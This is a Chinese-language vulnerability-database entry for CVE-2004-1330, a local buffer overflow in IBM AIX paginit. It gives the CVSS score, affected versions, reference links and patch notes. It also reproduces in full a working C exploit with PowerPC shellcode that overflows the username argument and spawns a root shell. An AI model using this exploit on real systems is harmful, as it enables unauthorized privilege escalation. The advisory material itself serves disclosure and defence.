CVE-2004-1330
CVSS7.2
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:53:18
NMCOE    

[原文]Buffer overflow in paginit in AIX 5.1 through 5.3 allows local users to execute arbitrary code via a long username.


[CNNVD]IBM AIX PAGINIT本地缓冲区溢出漏洞(CNNVD-200412-316)

        AIX 5.1至5.3版本的paginit存在缓冲区溢出漏洞。本地用户借助超长用户名执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:ibm:aix:5.2IBM AIX 5.2
cpe:/o:ibm:aix:5.3IBM AIX 5.3
cpe:/o:ibm:aix:5.2_lIBM AIX 5.2 L
cpe:/o:ibm:aix:5.3_lIBM AIX 5.3 L
cpe:/o:ibm:aix:5.2.2IBM AIX 5.2.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1330
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1330
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-316
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110355931920123&w=2
(UNKNOWN)  BUGTRAQ  20041220 AIX 5.1/5.2/5.3 local root exploits
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64312&apar=only
(VENDOR_ADVISORY)  AIXAPAR  IY64312
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64358&apar=only
(VENDOR_ADVISORY)  AIXAPAR  IY64358
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64522&apar=only
(VENDOR_ADVISORY)  AIXAPAR  IY64522
http://www.frsirt.com/exploits/20041220.paginit.c.php
(UNKNOWN)  MISC  http://www.frsirt.com/exploits/20041220.paginit.c.php
http://www.securityfocus.com/bid/12043
(PATCH)  BID  12043
http://xforce.iss.net/xforce/xfdb/18618
(UNKNOWN)  XF  aix-paginit-username-bo(18618)

- 漏洞信息

IBM AIX PAGINIT本地缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-31 00:00:00 2005-10-20 00:00:00
本地  
        AIX 5.1至5.3版本的paginit存在缓冲区溢出漏洞。本地用户借助超长用户名执行任意代码。
        

- 公告与补丁

        IBM has released fixes and an advisory to address this issue:
        IBM AIX 5.2
        
        IBM AIX 5.3
        
        IBM AIX 5.2 L
        
        IBM AIX 5.2.2
        
        IBM AIX 5.3 L
        

- 漏洞信息 (699)

AIX 5.1 to 5.3 paginit Local Stack Overflow Exploit (EDBID:699)
aix local
2004-12-20 Verified
0 cees-bart
N/A [点击下载]
/* exploit for /usr/bin/paginit
   tested on: AIX 5.2

   if the exploit fails it's because the shellcode
   ends up at a different address. use dbx to check,
   and change RETADDR accordingly.

   cees-bart <ceesb cs ru nl>
*/

#define RETADDR 0x2ff22c90

char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"      
"\x7c\xa8\x02\xa6"      
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"      
"\x7c\xc7\x48\x10"      
"\x38\x46\xc9\x05"      
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"      
"\x38\x87\xee\xef"      
"\x7c\xc9\x03\xa6"      
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"      
"\x2f\x73\x68\x00"
;

char envlabel[] = "X=";

void printint(char* buf, int x) {
  buf[0] = x >> 24;
  buf[1] = (x >> 16) & 0xff;
  buf[2] = (x >> 8) & 0xff;
  buf[3] = x & 0xff;
}

int main(int argc, char **argv) {
  char *env[3];
  char code[1000];
  char buf[8000];
  char *p, *i;
  int offset1 = 0;

  offset1 = 0; // atoi(argv[1]);
  
  memset(code, 'C', sizeof(code));
  memcpy(code, envlabel,sizeof(envlabel)-1);
  // landingzone 
  for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4) 
    printint(i, 0x7ca52a79);

  memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);  
  code[sizeof(code)-1] = 0;
  
  env[0] = code;
  env[1] = 0;

  memset(buf, 'A', sizeof(buf));
  buf[sizeof(buf)-1] = 0; 
  
  p = buf;
  p += 4114;
  printint(p,RETADDR); // try to hit the landingzone
  p += 72;
  printint(p, RETADDR); // any readable address (apparently not overwritten)

  execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}

// milw0rm.com [2004-12-20]
		

- 漏洞信息

12528
IBM AIX paginit Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-12-20 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站